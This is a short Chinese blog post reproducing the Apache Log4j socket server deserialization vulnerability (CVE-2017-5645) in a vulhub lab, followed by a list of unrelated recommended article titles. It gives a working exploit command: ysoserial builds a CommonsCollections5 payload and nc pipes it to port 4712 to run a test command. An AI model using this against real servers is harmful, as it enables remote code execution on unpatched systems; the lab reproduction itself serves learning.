vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
Lion Long1 天前
PB级数据洪流下的抉择:从大数据架构师视角,深度解析时序数据库选型与性能优化(聚焦Apache IoTDB)
大数据·性能优化·apache·时序数据库·iotdb
ybb_ymm1 天前
从需求开始至架构设计的适用于商家及小吃摊的点餐小程序
小程序·apache
谢尔登2 天前
【Nest】单元测试
单元测试·log4j
ZHOU_WUYI2 天前
Apache Spark 集群部署与使用指南
大数据·spark·apache
有一个好名字2 天前
万字 Apache ShardingSphere 完全指南:从分库分表到分布式数据库生态
数据库·分布式·apache
羑悻的小杀马特2 天前
下一代时序数据库标杆:Apache IoTDB架构演进与AIoT时代的数据战略
apache·时序数据库·iotdb
编啊编程啊程3 天前
【011】宠物共享平台
spring boot·log4j·maven·dubbo·宠物
cesske3 天前
uniapp 编译支付宝小程序canvas 合成图片实例,支付宝小程序 canvas 渲染图片 可以换成自己的图片即可
小程序·uni-app·apache
、花无将4 天前
PHP:下载、安装、配置,与apache搭建
android·php·apache
wei_shuo6 天前
Apache IoTDB 架构特性与 Prometheus+Grafana 监控体系部署实践
架构·apache·iotdb
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04GitLab 零基础入门指南:从安装到项目管理全流程05Linux下V2Ray安装配置指南06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南072025软件测试面试八股文(含答案+文档)08在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)09一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示10Labelme从安装到标注:零基础完整指南